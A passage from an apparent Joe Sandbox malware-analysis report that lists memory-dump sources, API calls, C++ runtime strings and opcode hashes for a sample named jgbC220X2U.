                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen
                • String ID:
                • API String ID: 39653677-0
                • Opcode ID: 965fe8e25530f16ec4401e9a498e8b86f701c27cafe4852159a5c1a85cec5717
                • Instruction ID: 924f1f0ce084bd93915fcf2c0eec8bfd8f706e7dcec003fec400f20ac6b90118
                • Opcode Fuzzy Hash: 965fe8e25530f16ec4401e9a498e8b86f701c27cafe4852159a5c1a85cec5717
                • Instruction Fuzzy Hash: C2E092A2F4921A41FD59F71B7D921A95211AF89FC8A988870CE4C0B742EC2DD8D34750
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: _errnostrlen
                • String ID: inity
                • API String ID: 860928405-2893408212
                • Opcode ID: 5bbb7f154341fc19ee67e97848e74b0aff3d4d6e9d21a44a62ef9a5c1f602feb
                • Instruction ID: 30dff15a4bc37ae97dd080d3b02345bb90db4e01cd827158e3cd917b88c7882c
                • Opcode Fuzzy Hash: 5bbb7f154341fc19ee67e97848e74b0aff3d4d6e9d21a44a62ef9a5c1f602feb
                • Instruction Fuzzy Hash: 56231972A04686CEE7B0DF79C8447EC77B1FB48348F548135DA09ABB49DB38D6809B60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy$wcslen
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                • API String ID: 1844840824-4063909124
                • Opcode ID: 282633a9cc72f4201cfc29e893ecc0b1e7fe6948553353cc08063c78b4bcf708
                • Instruction ID: 0d238c344f716eda13bacba563cb088ebcbde5b4c98e8d160599bb30d31cd1a2
                • Opcode Fuzzy Hash: 282633a9cc72f4201cfc29e893ecc0b1e7fe6948553353cc08063c78b4bcf708
                • Instruction Fuzzy Hash: B4A19F62A08A5781FB20AF69DC005BCA361EB45BD4BD48272DE1D473D5EE3CE542CB60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: AddressProc$HandleLibraryLoadModule
                • String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                • API String ID: 384173800-1835852900
                • Opcode ID: 7f6edc4b77b1e73b86a30ec1211ae682459a3124275125113fada9b650340b88
                • Instruction ID: 0325a421980ddaa601470d0f7255e8f67cc8ae399c7db6283fd68860be9a7e54
                • Opcode Fuzzy Hash: 7f6edc4b77b1e73b86a30ec1211ae682459a3124275125113fada9b650340b88
                • Instruction Fuzzy Hash: EB01E864B09A2BA1FAA1BF05BC001B4E3B5FF48794FD84171C84D17364AF2CE646DB20
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen$strcmp
                • String ID: *$basic_string::append
                • API String ID: 551667898-3732199748
                • Opcode ID: 21e32c51ea07e2c7da12383eba96a1f2ee0e31a9f34c1a7bfdf50ac497e45d5d
                • Instruction ID: b90a8f6eb4238863dc7e5e3f98d17e04578a829f753df05e88471a3545408ed8
                • Opcode Fuzzy Hash: 21e32c51ea07e2c7da12383eba96a1f2ee0e31a9f34c1a7bfdf50ac497e45d5d
                • Instruction Fuzzy Hash: 5F819D22B08A8681FB60EF26DC4037DA361EB45F84F888931DE5D477D5DE3EE9419B60
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
                • API String ID: 3510742995-937311740
                • Opcode ID: 7d65b6d2497f7b4197254a4bfd9bd5ee0819c960aa76c3d80a70703ec9362feb
                • Instruction ID: 79bb10d221301d6af21ecb137afb20681f5808f1b08c9f80f2119a9f95cd3845
                • Opcode Fuzzy Hash: 7d65b6d2497f7b4197254a4bfd9bd5ee0819c960aa76c3d80a70703ec9362feb
                • Instruction Fuzzy Hash: 5B818C62B04A4295EB30AF16ED005B9E365FB49BD4FC84172EE8C4BB85EE3CD685C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
                • API String ID: 3510742995-937311740
                • Opcode ID: c5e1539735b8215ac2f6ddfad73bd5e52e724e91942d7afdbb3b2f30a2e09a19
                • Instruction ID: 03b2bee88a051581c95c0961e489c033577fe755ae27d2b111437fcfc6e9ace9
                • Opcode Fuzzy Hash: c5e1539735b8215ac2f6ddfad73bd5e52e724e91942d7afdbb3b2f30a2e09a19
                • Instruction Fuzzy Hash: 9381BE62B04A5295EB70AF16ED005B9E365FB09BD4FC84232EE8C4BB55EE3CD585C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlenstrncmp
                • String ID: _GLOBAL_
                • API String ID: 1310274236-770460502
                • Opcode ID: 3f6e2dd7aa98c3b2ab22019e9bf9c0c08cd28e0503740a5061860dd6025ae2f3
                • Instruction ID: 63af1b8ff51c412fea2c74e4bb1d83c6cf4d413261b3d8e4e5ced81ce0c62bd4
                • Opcode Fuzzy Hash: 3f6e2dd7aa98c3b2ab22019e9bf9c0c08cd28e0503740a5061860dd6025ae2f3
                • Instruction Fuzzy Hash: 13E1E272A1868289F7E09F3598143FDBBB1FB04749F884135DA5C2A789CF38D741AB20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: Infinity$NaN
                • API String ID: 0-4285296124
                • Opcode ID: aafcee3c9c93976f574e5bb8fcfa2386e6dceb65d2947290c98fbd634e234a5b
                • Instruction ID: 49338b64530d3f42fbe4f026542c759908f97e49cab3b8e6e4aa72105780d380
                • Opcode Fuzzy Hash: aafcee3c9c93976f574e5bb8fcfa2386e6dceb65d2947290c98fbd634e234a5b
                • Instruction Fuzzy Hash: 35E24832A04B958EE7A1DF79C8403AC77B1FB5538CF548225EA0D5BB58DB38E681DB10
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: locale::_Impl::_M_replace_facet
                • API String ID: 0-4011348548
                • Opcode ID: 72738f8994c262bb5f7799b77502c2562ce0aaf15e0745a18c629bb13c54be0d
                • Instruction ID: db969e3728b64d79880566993c7f75d7a04a681946fc695416b7ec0e5654cde6
                • Opcode Fuzzy Hash: 72738f8994c262bb5f7799b77502c2562ce0aaf15e0745a18c629bb13c54be0d
                • Instruction Fuzzy Hash: E061C272B15B4281FF289F16DC50278A361FB94FA8F948339CE2D07390EF29D5958B64
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
                • API String ID: 3510742995-3532027576
                • Opcode ID: 6560ae8b6e28ef5645acd1f01819da82bef78dba976e931c9711306df1fb382c
                • Instruction ID: 0193d0d683853433267d2cd5ab9c6a5dea8d5c8e142745c132cf4e518a0c1d70
                • Opcode Fuzzy Hash: 6560ae8b6e28ef5645acd1f01819da82bef78dba976e931c9711306df1fb382c
                • Instruction Fuzzy Hash: 7921B063B08A4285EA60AF16ED405A9E360EB45FD8FCC4131DF8D47751EE7CD692C720
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: wcslen
                • String ID:
                • API String ID: 4088430540-0
                • Opcode ID: f3cb1d95bc54287335062b45fbd9652e952e49de895b6ced02b1f1b1d36cfaf5
                • Instruction ID: 57fbf1de1347129815e32bfa9f36399f4d5b56e7bdb547552b969bf008cef195
                • Opcode Fuzzy Hash: f3cb1d95bc54287335062b45fbd9652e952e49de895b6ced02b1f1b1d36cfaf5
                • Instruction Fuzzy Hash: EDF27F36608BD585EBA09F26E8403AEB7B5FB85B84F894522DECD03B94DF38D541DB10
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: decltype(nullptr)
                • API String ID: 0-1940065048
                • Opcode ID: 78828b7db6fe318bbf2009b3bed0eca2d93f8c7d3666377adfd48aacc70b5d23
                • Instruction ID: 78c09a75c8c486d83c3903f5ef26b9ddc353a44b4ff80503b192aa3679cd5826
                • Opcode Fuzzy Hash: 78828b7db6fe318bbf2009b3bed0eca2d93f8c7d3666377adfd48aacc70b5d23
                • Instruction Fuzzy Hash: 9232D652E0C28645FBE4AE155C05379F6E6FB42B84FDC8031C64D277C6DE2CEA91AB60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: wcslen
                • String ID:
                • API String ID: 4088430540-0
                • Opcode ID: d5ba5f46809b4bc38e68fbdece770d2cb77e27869f3d51206183a512e30fadf5
                • Instruction ID: 3c048f577c343e4adcb0773eda9912dd952dd412e21127220b14eb14e5952925
                • Opcode Fuzzy Hash: d5ba5f46809b4bc38e68fbdece770d2cb77e27869f3d51206183a512e30fadf5
                • Instruction Fuzzy Hash: E9329D26A08A8285FB71AF29D8407FDA360FB88B54F945671DE8D177A4FF38D445CB20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: std$string literal
                • API String ID: 0-2980153874
                • Opcode ID: eb845e9d3f49ee4b7da220122d2df9fa13bdbd68aa978b1a0c0a98639591395f
                • Instruction ID: 7c600c95593146c67e1223b9a310afb17e22207a118fcf6fc1a8800f9da60e7c
                • Opcode Fuzzy Hash: eb845e9d3f49ee4b7da220122d2df9fa13bdbd68aa978b1a0c0a98639591395f
                • Instruction Fuzzy Hash: D8B190B290974247EBE4AF159850279E7F2FB41B88FDC4170CA0D27395DE3CEA51AB50
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 18682d9b56306a49cd2a8c77fe8c5846ac32a1897fd6e81d6c36565c0b9b8f27
                • Instruction ID: e80f8aacf4ad3279a244f2df774c66680a2b06a6fa330c1710ebedc69ad0c46a
                • Opcode Fuzzy Hash: 18682d9b56306a49cd2a8c77fe8c5846ac32a1897fd6e81d6c36565c0b9b8f27
                • Instruction Fuzzy Hash: 2BD2A232608BC585EBA09F25E8403AEBBB0FB85B94F484525DF9D43B98DF38D551DB20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                • API String ID: 3510742995-2669816585
                • Opcode ID: d946b78594f97b63345237074f825bab68942294293cc57e4b3a05a56d8db7bf
                • Instruction ID: d39302b442381d6ae056bb18dcb126fdef610015784f507f823716fea988c1df
                • Opcode Fuzzy Hash: d946b78594f97b63345237074f825bab68942294293cc57e4b3a05a56d8db7bf
                • Instruction Fuzzy Hash: 84F06DAAF05A8681FB10FF66DC014A8A361F759F98FC49162DA4C13325EE3CE596CB14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
